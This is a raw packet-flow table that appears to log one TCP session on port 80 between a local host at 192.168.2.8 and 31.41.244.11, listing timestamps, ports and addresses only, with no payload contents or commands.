Dec 18, 2024 13:38:34.075602055 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.075712919 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.075762033 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.077616930 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.077703953 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.077752113 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.077804089 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.079762936 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.079818964 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.080038071 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.080092907 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.081712961 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.081772089 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.171838045 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.171902895 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.171972036 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.172020912 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.172692060 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.172724009 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.172755003 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.172755003 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.173887968 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.173933029 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.174082041 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.174133062 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.175616026 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.175661087 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.175936937 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.176040888 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.177227020 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.177269936 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.177314043 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.177398920 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.178544998 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.178591967 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.178752899 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.178797960 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.180125952 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.180169106 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.180172920 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.180217981 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.181613922 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.181674957 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.181694031 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.181740999 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.183202028 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.183247089 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.183295012 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.183340073 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.184606075 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.184653044 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.184708118 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.184751987 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.186104059 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.186148882 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.186243057 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.186288118 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.187536001 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.187588930 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.187630892 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.187674999 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.188927889 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.188981056 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.189053059 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.189095020 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.190373898 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.190428019 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.190470934 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.190512896 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.191854954 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.191900015 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.191916943 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.191960096 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.193171024 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.193217039 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.193380117 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.193429947 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.194559097 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.194606066 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.194668055 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.194711924 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.195949078 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.196013927 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.196032047 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.196074009 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.197423935 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.197437048 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.197468996 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.198688030 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.198740005 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.198791981 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.198833942 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.200017929 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.200059891 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.200109959 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.200155020 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.201508999 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.201558113 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.201617002 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.201661110 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.202655077 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.202701092 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.202816963 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.202860117 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.204627991 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.204673052 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.204925060 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.204972029 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.205564022 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.205605984 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.205853939 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.205897093 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.207561016 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.207573891 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.207607985 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.208139896 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.208184004 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.208379030 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.208424091 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.209439039 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.209485054 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.209578991 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.209625006 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.211085081 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.211098909 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.211154938 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.212182045 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.212224960 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.212258101 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.212299109 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.213468075 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.213512897 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.213526011 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.213568926 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.214667082 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.214710951 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.214742899 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.214791059 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.215987921 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.216083050 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.216129065 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.216175079 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.217317104 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.217398882 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.217438936 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.217502117 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.218692064 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.218745947 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.218754053 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.218784094 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.219944954 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.220005989 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.220079899 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.220130920 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.221692085 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.221751928 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.221960068 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.222027063 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.223134041 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.223190069 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.223196030 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.223237991 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.224220037 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.224281073 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.224409103 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.224457979 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.225517035 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.225611925 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.225725889 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.225774050 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.226840973 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.226886034 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.226901054 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.226944923 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.228157043 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.228171110 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.228200912 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.228219986 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.229538918 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.229553938 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.229588985 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.229604959 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.230582952 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.230640888 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.230711937 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.230765104 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.232182026 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.232198000 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.232240915 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.232258081 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.233511925 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.233560085 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.233608961 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.233649015 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.234824896 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.234879971 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.234956980 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.234998941 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.236408949 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.236454010 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.236498117 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.236541033 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.238027096 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.238039017 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.238076925 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.238775015 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.238820076 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.238852024 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.238895893 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.240072966 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.240118980 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.240271091 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.240320921 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.241329908 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.241359949 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.241377115 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.241417885 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.242479086 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.242532015 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.242624044 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.242669106 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.243776083 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.243824005 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.364032984 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.364094019 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.364119053 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.364195108 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.364548922 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.364609003 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.364645958 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.364695072 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.365564108 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.365617990 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.365720034 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.365767002 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.366741896 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.366753101 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.366800070 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.367686033 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.367742062 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.367790937 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.367844105 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.368767977 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.368818998 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.368885994 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.368935108 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.370064020 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.370121956 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.370160103 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.370207071 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.370860100 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.370912075 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.370953083 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.371002913 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.371980906 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.372031927 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.372149944 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.372200012 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.373214960 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.373266935 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.373332024 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.373380899 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.374346018 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.374403954 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.374440908 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.374496937 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.375127077 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.375184059 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.375247002 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.375298023 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.376353979 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.376368999 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.376413107 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.376446009 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.377759933 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.377813101 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.377854109 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.377909899 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.378318071 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.378377914 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.378868103 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.378926992 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.379558086 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.379609108 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.379615068 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.379668951 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.380676031 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.380688906 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.380736113 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.381503105 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.381556988 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.381607056 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.381658077 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.382546902 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.382607937 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.382791042 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.382843971 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.383714914 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.383769989 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.383821964 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.383949041 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.384846926 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.384857893 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.384910107 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.385720968 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.385778904 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.385885954 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.385942936 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.386810064 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.386867046 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.387017965 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.387073040 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.387871981 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.387928009 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.387968063 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.388020992 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.388904095 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.388964891 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.389081001 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.389132977 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.390018940 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.390075922 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.390129089 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.390177011 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.391165018 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.391228914 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.391231060 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.391285896 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.392271996 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.392332077 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.392416000 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.392474890 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.393338919 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.393388033 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.393419981 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.393465996 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.394246101 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.394298077 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.394387007 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.394458055 CET	49715	80	192.168.2.8	31.41.244.11
